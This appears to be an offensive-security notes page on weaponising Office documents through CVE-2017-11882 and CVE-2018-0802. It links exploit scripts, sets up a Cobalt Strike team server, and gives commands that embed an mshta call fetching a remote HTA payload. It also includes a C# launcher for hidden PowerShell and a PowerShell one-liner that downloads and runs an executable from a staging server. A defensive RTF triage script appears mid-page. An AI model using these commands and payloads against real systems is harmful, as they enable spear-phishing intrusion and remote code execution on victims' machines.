Spent a day going through APT reports. The vulnerabilities mainly used in Office spear-phishing attacks are still the same three Microsoft Office bugs, CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802, and since Office is rarely updated, simply opening the document is enough to get infected. The hard part is AV evasion for the doc: it gets detected easily, for example with the common mshta approach.
Exploit scripts:
https://github.com/denmilu/CVE-2018-0802_CVE-2017-11882 (this script combines both vulnerabilities)
https://github.com/rxwx/CVE-2018-0802
https://github.com/Ridter/CVE-2017-11882/
The msf module can also be used.
Linux (Kali 2018.4, Ubuntu 18.04)
- Update APT
sudo apt-get update
- Install OpenJDK 11 with APT
sudo apt-get install openjdk-11-jdk
- Make OpenJDK 11 the default:
sudo update-java-alternatives -s java-1.11.0-openjdk-amd64
Linux (Other)
- Uninstall the current OpenJDK package(s)
- Download OpenJDK for Linux/x64 at: https://jdk.java.net/11/
- Extract the OpenJDK binary:
tar zxvf openjdk-11.0.1_linux-x64_bin.tar.gz
- Move the OpenJDK folder to /usr/local:
mv jdk-11.0.1 /usr/local
- Add the following to ~/.bashrc
JAVA_HOME="/usr/local/jdk-11.0.1"
PATH=$PATH:$JAVA_HOME/bin
- Refresh your ~/.bashrc to make the new environment variables take effect
source ~/.bashrc
For environment setup details, see the official Cobalt Strike docs: https://www.cobaltstrike.com/help-java-dependency
Start the team server (IP is the address the team server listens on, password is the one clients connect with):
chmod +x teamserver
nohup ./teamserver <IP> <password> &
First generate an HTA payload with Cobalt Strike and host it at a URL; then build the malicious document with the mshta command that fetches it (the xx hosts and port 8001 below are the staging server):
python webdav_exec_CVE-2017-11882.py -u http://xxxxx.xx.xxx:8001/evil.hta -e "mshta http://xxxx.x.x.x.x:8001/evil.hta" -o test.doc
python RTF_11882_0802.py -c "mshta http://xx.xxx.xx.xx:8001/evil.hta" -o test.doc
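Since the page notes these docs get caught easily, it helps to see what the defender side actually looks at. The following Python triage script is an added example, not code from this page or from the linked repos: it pulls the hex \objdata blobs out of an RTF, reads the OLE1 class name, flags the Equation Editor class ("Equation.3") and the \objupdate control word, and scans the decoded object for command-like strings such as mshta, which is exactly what the -c / -e argument of the scripts above embeds. The sample RTF inside it is a constructed fixture (an OLE1 header plus a fake payload string), not a working exploit, and example.invalid is a placeholder host.

```python
import binascii
import re

# Equation Editor 3.0 (EQNEDT32.EXE) is the component patched for
# CVE-2017-11882 and CVE-2018-0802; its OLE class name is "Equation.3".
EQUATION_CLASSES = (b"Equation.3", b"Equation.2")

# Command-line tokens typically found in the string the exploit scripts embed
# (the -c / -e argument on the page), plus URL and UNC prefixes.
SUSPICIOUS_TOKENS = (b"mshta", b"powershell", b"cmd.exe", b"cmd /", b"regsvr32",
                     b"rundll32", b"certutil", b"bitsadmin",
                     b"http://", b"https://", b"\\\\")

# Hex body of a {\*\objdata ...} group; it may be split by whitespace/newlines.
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]*)")
PRINTABLE_RE = re.compile(rb"[\x20-\x7e]{6,}")


def decode_objdata(rtf: bytes) -> list:
    """Return every \\objdata blob in the RTF, hex-decoded."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(rb"\s+", b"", m.group(1))
        if len(hexstr) % 2:  # tolerate a truncated trailing nibble
            hexstr = hexstr[:-1]
        if hexstr:
            blobs.append(binascii.unhexlify(hexstr))
    return blobs


def ole1_class_name(blob: bytes):
    """Class name from an OLE1 object header: 4-byte version, 4-byte format id,
    4-byte little-endian length, then the NUL-terminated ANSI class name."""
    if len(blob) < 12:
        return None
    nlen = int.from_bytes(blob[8:12], "little")
    if nlen == 0 or nlen > 256 or len(blob) < 12 + nlen:
        return None
    return blob[12:12 + nlen].rstrip(b"\x00")


def extract_strings(blob: bytes) -> list:
    """Printable ASCII runs of 6+ chars (the embedded command is plain ANSI)."""
    return PRINTABLE_RE.findall(blob)


def triage(rtf: bytes) -> dict:
    """Collect the indicators an analyst checks on a suspected 11882/0802 RTF."""
    report = {
        # \objupdate forces the object to load on open, so no click is needed
        "objupdate": b"\\objupdate" in rtf,
        "objclass_equation": any(c in rtf for c in EQUATION_CLASSES),
        "objects": [],
    }
    for blob in decode_objdata(rtf):
        strings = extract_strings(blob)
        lowered = [s.lower() for s in strings]
        hits = sorted(t.decode() for t in SUSPICIOUS_TOKENS
                      if any(t.lower() in s for s in lowered))
        report["objects"].append({
            "class": ole1_class_name(blob),
            "equation_editor": any(c in blob for c in EQUATION_CLASSES),
            "suspicious": hits,
            "strings": strings,
        })
    eq = report["objclass_equation"] or any(o["equation_editor"] for o in report["objects"])
    cmd = any(o["suspicious"] for o in report["objects"])
    if eq and cmd:
        report["verdict"] = "suspicious"
    elif eq or cmd or report["objupdate"]:
        report["verdict"] = "review"
    else:
        report["verdict"] = "no indicators"
    return report


# Constructed fixture (NOT a working exploit): an OLE1 header naming Equation.3,
# then filler and a command string in the style of the scripts' -c argument.
_OLE1_HEADER = (b"\x01\x05\x00\x00"                       # OLE version
                + b"\x02\x00\x00\x00"                     # format id: embedded
                + len(b"Equation.3\x00").to_bytes(4, "little")
                + b"Equation.3\x00")
_FAKE_NATIVE = b"\x00" * 8 + b"mshta http://example.invalid/evil.hta" + b"\x00" * 4
SAMPLE_RTF = (b"{\\rtf1\\ansi\\deff0{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}"
              b"{\\*\\objdata " + binascii.hexlify(_OLE1_HEADER + _FAKE_NATIVE) + b"}}}")
BENIGN_RTF = b"{\\rtf1\\ansi\\deff0 Quarterly report, nothing embedded.}"

if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_RTF), ("benign", BENIGN_RTF)):
        r = triage(doc)
        print(name, r["verdict"], [(o["class"], o["suspicious"]) for o in r["objects"]])
```

Run it on a generated test.doc with `triage(open("test.doc", "rb").read())`. The class-name and \objupdate checks only cover the Equation Editor chain (CVE-2017-11882 / CVE-2018-0802); the string scan is what still fires on other object types, and both are trivially defeated by an attacker who obfuscates the RTF or the command string, which is why the page's evasion remark matters.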
This article is also worth a look:
http://www.sohu.com/a/222892615_609556
A minimal C# wrapper that launches PowerShell with a given argument string (compile it into an exe that the payload drops or runs):
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace shell
{
    class Program
    {
        static void Main(string[] args)
        {
            // Arguments handed to powershell.exe, i.e. everything after "powershell"
            // in the one-liner below ("-nop -w hidden -Exec Bypass -Command ...").
            string strCmdText;
            strCmdText = "your-powershell-here";
            // Spawns powershell.exe as a child of this process with those arguments.
            System.Diagnostics.Process.Start("powershell.exe", strCmdText);
        }
    }
}
The PowerShell one-liner to plug in: it downloads notepad.exe from the staging server into the current working directory and starts it (no profile, hidden window, execution policy bypassed):
powershell -nop -w hidden -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://xx.xx.xx.xx.xx/notepad.exe','notepad.exe');start-process notepad.exe